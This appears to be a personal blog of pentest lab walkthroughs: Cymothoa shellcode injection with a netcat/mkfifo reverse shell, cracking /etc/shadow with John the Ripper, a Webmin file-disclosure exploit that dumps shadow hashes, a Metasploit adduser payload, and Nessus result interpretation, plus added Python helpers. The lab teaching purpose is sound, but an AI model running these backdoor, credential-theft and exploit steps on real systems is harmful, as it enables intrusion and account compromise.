Monday, 30 January 2012

Cymothoa – Inject Shellcode into UBUNTU nc + mkfifo

Cymothoa is a stealth backdooring tool that injects a backdoor's shellcode into an existing process. It uses ptrace (available on nearly all *nix systems) to attach to a running process and infect it, so no new binary or process appears on the target.


1. Before running Cymothoa, boot the Ubuntu target in VirtualBox.
2. Start a netcat listener on BackTrack:
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321
3. On the Ubuntu side we need a named pipe (mkfifo) so the shell can talk to nc, because the nc shipped with Ubuntu (the OpenBSD build) has no -e option, unlike the nc in BackTrack. The shell reads its input from the FIFO and its output is piped into nc, which connects to the listener above; nc's output is redirected back into the FIFO, which closes the loop.
4. Once Ubuntu has connected back, run ls in the BackTrack console.

We can see that BT now has a shell on Ubuntu.

5. Now we send cymothoa to Ubuntu with nc. Open a new terminal.
    - copy the cymothoa binary from /pentest/backdoors/cymothoa
       root@bt:~# cd /pentest/backdoors/cymothoa/
       root@bt:/pentest/backdoors/cymothoa# cp cymothoa /home/
    - create a .tar file
       root@bt:/home# tar -cvf myfile.tar cymothoa
       root@bt:/home# ls
       cymothoa  myfile.tar  tes
OK, we have the .tar file (a plain tar archive, not a .rar) and will send it to Ubuntu.

On BackTrack, serve it over nc. Here the sending side is the one that listens; -q 10 makes nc exit 10 seconds after tar closes its end, so the receiver sees EOF instead of hanging. Note that this line streams the whole /home directory, so the myfile.tar created above is not actually needed:

root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878

On the Ubuntu terminal, connect to port 7878 on the BackTrack IP with nc and pipe its output into tar x (the receiving side is a plain client connection, not a second listener).
OK, the cymothoa transfer succeeded.
Now, back in the BackTrack terminal that holds the Ubuntu shell:

6. Extract the .tar file on Ubuntu. After that, run the binary once with no arguments to see its usage:

./cymothoa

7. ps aux
   Look for the PID of the /bin/bash process to infect. We get PID 1326.

8. ./cymothoa -p 1326 -s 0 -y 54321
   -p 1326 is the PID to inject into, -s 0 selects shellcode 0 (bind /bin/sh to a port) and -y 54321 is that port. Cymothoa attaches with ptrace, so it needs ptrace rights over the target process (running it as root is the simple case). Afterwards, connect from BackTrack to port 54321 on the Ubuntu IP with nc to reach the backdoor shell; it lives only as long as the infected bash process does.
OK, success :D
GOOD LUCK

Crack /etc/shadow using JTR

JOHN THE RIPPER
After trying several ways to crack /etc/shadow passwords with John the Ripper, I finally found one that works, although not yet perfectly.
In this case there are two users: a normal user and root.

1. First, go to /etc to look at passwd and shadow:

root@sinobi:/etc#

2.  root@sinobi:/etc# cat passwd

We can see the users root and tes.

root@sinobi:/etc# cat shadow

The difference between passwd and shadow is clear: passwd is world-readable and holds only an "x" in the password field, while the hashes are kept in shadow, which only root can read.

3.  Run John the Ripper. First copy the two files into john's directory:

root@sinobi:/pentest/passwords/john# cp /etc/passwd passwd
root@sinobi:/pentest/passwords/john# cp /etc/shadow shadow
4. Merge the passwd and shadow files (unshadow puts each shadow hash into the password field of the matching passwd line, which is the layout john expects):
root@sinobi:/pentest/passwords/john# ./unshadow passwd shadow  > crack_file
5. CRACKING THE PASSWORD

Running john on crack_file, we can see that only the normal user's password was cracked; the root password was not. That is the expected outcome when the root password is not in the wordlist and is long enough that incremental mode does not reach it in the time given.

PRIVILEGE ESCALATION Host 192.168.0.122



THE STEPS
  1. INFORMATION GATHERING
    I did the information gathering with Nmap, and the scan (screenshot not reproduced here) shows:

    The services and ports running on the host.
  2. SERVICE ENUMERATION
    Now we know which services are running on the host:
    Port 22        SSH
    Port 80        HTTP
    Port 139       netbios-ssn (Samba)
    Port 445       netbios-ssn (Samba)
    Port 10000/tcp HTTP
  3. VULNERABILITY IDENTIFICATION
    For the VA this time I used Nessus.
    Because I was looking for the username and password of the web application, I started with the vulnerabilities on port 10000, and found one there.
    Then I looked at http://192.168.0.112 in the browser (screenshot).
    After that I opened http://192.168.0.112:10000 (screenshot). Sorry about this picture; the right one is behind the terminal. It shows a login form that asks for a username and password.

    From the Nessus information I knew I had to look for Webmin, so I searched for it in the exploit database:

    root@sinobi:/pentest/exploits/exploitdb# ./searchsploit webmin

    After that, copy the script to /home, where we will run it:
    root@sinobi:/pentest/exploits/exploitdb# cp platforms/multiple/remote/2017.pl /home/
    Now open the file, for example with kwrite. 2017.pl is a Perl script. Reading it, you need to know that the last argument selects the transport: 0 = http, 1 = https. This is used when we run the command, like this:

    root@sinobi:/home# perl 2017.pl <ip> <port> <file to read> <0 for http, 1 for https>

    root@sinobi:/home# perl 2017.pl 192.168.0.112 10000 /etc/password 0
    and the result of the command is:


    vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
    obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
    osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
    yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

    The output is in /etc/shadow format (user, hash, last-change day, aging fields); /etc/password is not a standard file, so treat the output as the content of /etc/shadow. Since shadow is readable only by root, this also shows that the Webmin server runs as root. The $1$ prefix on every hash means md5crypt.

    OK, in the next lesson I will explain how to crack these passwords using JTR.
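As an added example (not from the post, and not John the Ripper's own code) serving both the unshadow step in the JTR post above and the shadow lines just obtained: it performs the same merge that `unshadow passwd shadow` does and classifies each password field by its modular-crypt prefix, which is what decides the John format and the salt. The SHADOW lines are the four returned by the exploit; the PASSWD lines are constructed to match those users (UIDs, home directories and the root line are made up).

```python
"""unshadow merge and hash-format identification (added example)."""

# Constructed: what /etc/passwd might hold for the accounts seen above.
PASSWD = """\
root:x:0:0:root:/root:/bin/bash
vmware:x:1000:1000:VMware User:/home/vmware:/bin/bash
obama:x:1001:1001::/home/obama:/bin/bash
osama:x:1002:1002::/home/osama:/bin/bash
yomama:x:1003:1003::/home/yomama:/bin/bash
"""

# The shadow lines returned by the Webmin exploit (root's line was not among them).
SHADOW = """\
vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::
"""

# Modular-crypt prefixes and what John calls the corresponding format.
HASH_FORMATS = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt",
    "$2b$": "bcrypt",
    "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
}


def parse_shadow(text):
    """Return {user: hash_field} for every non-empty shadow line."""
    hashes = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, hash_field = line.split(":", 2)[:2]
        hashes[user] = hash_field
    return hashes


def unshadow(passwd_text, shadow_text):
    """What `unshadow` does: put each shadow hash into the password field of
    the matching passwd line. Users with no shadow entry keep their "x"."""
    hashes = parse_shadow(shadow_text)
    merged = []
    for line in passwd_text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if fields[0] in hashes:
            fields[1] = hashes[fields[0]]
        merged.append(":".join(fields))
    return merged


def hash_format(field):
    """Classify a password field: which John format, or why it cannot be cracked."""
    if field in ("", "x"):
        return "no-hash"          # nothing to crack; the hash is elsewhere or absent
    if field.startswith(("!", "*")):
        return "locked"           # account disabled; no valid hash
    for prefix, name in HASH_FORMATS.items():
        if field.startswith(prefix):
            return name
    if len(field) == 13:
        return "descrypt"         # traditional DES crypt: 2-char salt + 11 chars
    return "unknown"


def salt_of(field):
    """The salt of a $id$salt$hash field (each hash carries its own salt)."""
    return field.split("$")[2]


def crack_candidates(merged):
    """(user, format) for each merged line that carries a real hash."""
    out = []
    for line in merged:
        user, field = line.split(":")[:2]
        fmt = hash_format(field)
        if fmt not in ("no-hash", "locked", "unknown"):
            out.append((user, fmt))
    return out


if __name__ == "__main__":
    for line in unshadow(PASSWD, SHADOW):
        print(line)
    print(crack_candidates(unshadow(PASSWD, SHADOW)))
```

Because root has no line in the recovered shadow data, the merge leaves its field as "x" and it drops out of the candidates; that is the same reason a crack run can only recover users whose hashes you actually have. John detects the md5crypt format from the $1$ prefix on its own, so no format flag is needed for these lines.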



Friday, 27 January 2012

Exploitation with msf on VirtualBox (XP)

1. First

  • We must know the IP of the Windows XP machine on VirtualBox:
IP  192.168.56.101

  • Now we scan the IP address with Nmap and Nessus
by Nmap
by Nessus
The screenshots show the running services. I chose SMB.


Why did I use NETAPI?
Because of the information from Nessus; see the part of the screenshot I highlighted.


Set the payload:
set PAYLOAD windows/adduser

Unless USER and PASS are set, this payload creates the account with its built-in defaults. I have created a new user :D

Good Luck

Vulnerability Process until Exploitation Process

After collecting the information-gathering results and looking at the service enumeration, we look for vulnerabilities: weaknesses in the system that allow exploitation of the target computer.

In this case we will use Nessus and Nmap. Both tools are very useful for vulnerability scanning.

First, I apologize for my writing this time: it is not accompanied by a screenshot of the Nmap results in the terminal, because I forgot to take one, but I will give another example for the same purpose.



First
NMAP scanning
1.    I scan the network:
       root@sinobi:~# nmap -sV 192.168.0.0/24
Which finds these IPs:
192.168.0.21
192.168.0.26
192.168.0.32
192.168.0.35
192.168.0.40
192.168.0.43
192.168.0.44
192.168.0.45
192.168.0.63
192.168.0.64
192.168.0.65
192.168.0.66
192.168.0.67
192.168.0.70
192.168.0.71
So 15 hosts are currently active. (Hosts that drop nmap's discovery probes are not listed; cross-checking with the Nessus scan below is one way to catch them.) As an example of the output produced by nmap -sV:


From this process we can pick out the essential information, such as:
IP addresses
Ports / services running, etc.



=======================================================================
second
Nessus
1. Run Nessus
- Open the browser
- Type the URL https://127.0.0.1 (the Nessus 4 web interface listens on port 8834, so use https://127.0.0.1:8834 if the bare address does not answer)
- The login page appears



Enter your username and password.
- On the Scans menu, click Add. The scan form appears:



Fill in a name in the Name field, set Type to "Run Now", select the policy (External Network Scan) and enter the target IP range to scan, in this case 192.168.0.0/24, so it scans the whole network. The reason I also use nmap is to make sure every host has been recorded by Nessus.
2. After the scan finishes it displays the results:

Here there are 15 active hosts; the nmap and Nessus results agree.
3. Report for the first IP, 192.168.0.22



Here there are 9 entries (Nessus lists the general/icmp, general/tcp and general/udp pseudo-ports alongside the real services):
- icmp
- tcp
- udp
- ssh
- www
- netbios-ns
- smb
- cifs
- www



    I will explain the Nessus results for the SSH service running on port 22.
Synopsis: An SSH server is running on the remote host.

>> SSH / PORT 22
      Nessus reports five plugins for this port:
    *** Debian OpenSSH/OpenSSL Package Random Number Generator Weakness


        Explanation
        Synopsis: The remote SSH host keys are weak.
        Description
       The remote SSH host key has been generated on a Debian 
       or Ubuntu system which contains a bug in the random number
       generator of its OpenSSL library.


       The problem is due to a Debian packager removing nearly all
       sources of entropy in the remote version of OpenSSL.


       An attacker can easily obtain the private part of the remote
       key and use it to decipher the remote session or
       set up a man-in-the-middle attack.


      Solution
      Consider all cryptographic material generated on the remote host
      to be guessable. In particular, all SSH, SSL and OpenVPN key
      material should be re-generated.
   conclusion
   there is a vulnerability: the host key comes from the tiny CVE-2008-0166 keyspace, and Debian/Ubuntu ship ssh-vulnkey (with the openssh-blacklist package) and openssl-blacklist to check keys against it. The banner reported below (OpenSSH_4.6p1 Debian-5build1) is from before the May 2008 fix, which is consistent with this finding.

    *** SSH Server type and version information
        Synopsis: An SSH server is listening on this port.


       Description
       It is possible to obtain information about the remote SSH
       server by sending an empty authentication request.


       Solution
       n/a


       Risk Factor: None


       Plugin Output
       SSH version : SSH-2.0-OpenSSH_4.6p1 Debian-5build1
       SSH supported authentication : publickey,password


       Plugin Publication Date: 1999/10/12


       Plugin Last Modification Date: 2011/10/24
       conclusion
    there isn't a vulnerability; this is informational only

    *** Service Detection
         Synopsis: The remote service could be identified.

       Description
       It was possible to identify the remote service by its banner or by looking
       at the error message it sends when it receives an HTTP request.

       Solution
       n/a

      Risk Factor: None

      Plugin Output
      An SSH server is running on this port.

      Plugin Publication Date: 2007/08/19

      Plugin Last Modification Date: 2012/01/19
       conclusion
    there isn't a vulnerability; this is informational only
    *** SSH Protocol Versions Supported
        Synopsis: A SSH server is running on the remote host.


        Description
        This plugin determines the versions of the SSH protocol supported by
        the remote SSH daemon.


        Solution
        n/a


        Risk Factor: None


        Plugin Output
        The remote SSH daemon supports the following versions of the
        SSH protocol :


       - 1.99
       - 2.0




     SSHv2 host key fingerprint : 10:cc:35:45:8e:f2:7a:a1:cc:db:a0:e8:bf:c7:73:3d


      Plugin Publication Date: 2002/03/06


      Plugin Last Modification Date: 2011/03/30
       conclusion
    there isn't a vulnerability as such, but a "1.99" banner means the daemon still accepts SSH protocol 1 clients; set "Protocol 2" in sshd_config to turn that off.
    *** Backported Security Patch Detection (SSH)
         Synopsis: Security patches are backported.


         Description
         Security patches may have been 'back ported' to the remote SSH server
         without changing its version number. 


         Banner-based checks have been disabled to avoid false positives.


         Note that this test is informational only and does not denote any 
         security problem.
  
         Solution
         N/A


        See Also
        http://www.nessus.org/u?d636c8c7


        Risk Factor: None


        Plugin Output
        Give Nessus credentials to perform local checks.


        Plugin Publication Date: 2009/06/25
       conclusion
    there isn't a vulnerability; this is informational, and without credentials Nessus cannot tell whether fixes were backported behind the unchanged version banner.

>> WWW / PORT 80


there are vulnerabilities
*** Plugin ID 34850
    Name Web Server Uses Basic Authentication without HTTPS (the credentials cross the wire base64-encoded, i.e. effectively in clear)
***  Plugin ID 46803
     Name PHP expose_php Information Disclosure
***  Plugin ID 11213
     Name HTTP TRACE / TRACK Methods Allowed
 >> SMB / PORT 445 (cifs)
 *** Plugin ID 10394
     Name Microsoft Windows SMB Log In Possible
***Plugin ID 10859
     Name Microsoft Windows SMB LsaQueryInformationPolicy Function SID Enumeration
>> WWW / PORT 10000
*** Plugin ID 10757
     Name Webmin Detection
*** Plugin ID 22300
     Name Webmin / Usermin Null Byte Filtering Vulnerabilities
*** Plugin ID 21785
     Name Webmin / Usermin miniserv.pl Arbitrary File Disclosure
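As an added example (not from the post and not Nessus's plugin code), here is the check behind plugin 11213, "HTTP TRACE / TRACK Methods Allowed", run against two throw-away servers on 127.0.0.1: one that echoes TRACE requests the way web servers of that era did by default, and one hardened to refuse the method (the equivalent of Apache's TraceEnable Off). The servers, ports and the probe header are constructed for this demo.

```python
"""TRACE / TRACK (cross-site tracing) check with a vulnerable and a fixed server (added example)."""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

PROBE = "xst-probe-7f3a"  # constructed marker we expect to see reflected if TRACE works


class EchoingHandler(BaseHTTPRequestHandler):
    """Vulnerable: answers TRACE by reflecting the request, headers included.
    Combined with a script-injection bug elsewhere this lets page script read
    cookies and Authorization headers that HttpOnly was meant to hide (XST)."""

    def do_TRACE(self):
        body = (self.requestline + "\r\n" + str(self.headers)).encode()
        self.send_response(200)
        self.send_header("Content-Type", "message/http")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


class HardenedHandler(BaseHTTPRequestHandler):
    """Fixed: TRACE and TRACK get 405 and nothing is reflected."""

    def do_TRACE(self):
        self.send_response(405)
        self.send_header("Allow", "GET, HEAD")
        self.send_header("Content-Length", "0")
        self.end_headers()

    do_TRACK = do_TRACE  # TRACK is IIS's spelling of the same method

    def log_message(self, *args):
        pass


def method_reflected(host, port, method="TRACE"):
    """The scanner's test: send the method with a marker header and report
    whether the server echoed the marker back in a 200 response."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request(method, "/", headers={"X-Probe": PROBE})
        resp = conn.getresponse()
        body = resp.read().decode(errors="replace")
    finally:
        conn.close()
    return resp.status == 200 and PROBE in body


def start_server(handler):
    server = HTTPServer(("127.0.0.1", 0), handler)  # port 0: any free port
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def run_checks():
    """Run the TRACE probe against both servers; True means the finding applies."""
    results = {}
    for name, handler in (("vulnerable", EchoingHandler), ("hardened", HardenedHandler)):
        server = start_server(handler)
        try:
            results[name] = method_reflected("127.0.0.1", server.server_address[1])
        finally:
            server.shutdown()
            server.server_close()
    return results


if __name__ == "__main__":
    print(run_checks())
```

The probe header is what makes the check reliable: a 200 alone does not prove the method is live, but seeing your own marker come back does, and that is also the property an attacker abuses. A server that has not implemented TRACE at all (Python's base handler answers 501) is reported as not reflecting, which is the right answer for the finding.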




4. Trying the vulnerability with Exploit-DB
For example:

root@sinobi:/pentest/exploits/exploitdb# ./searchsploit smb
then read the matching entry to get information on how to exploit it:
root@sinobi:/pentest/exploits/exploitdb# cat platforms/windows/remote/14674.txt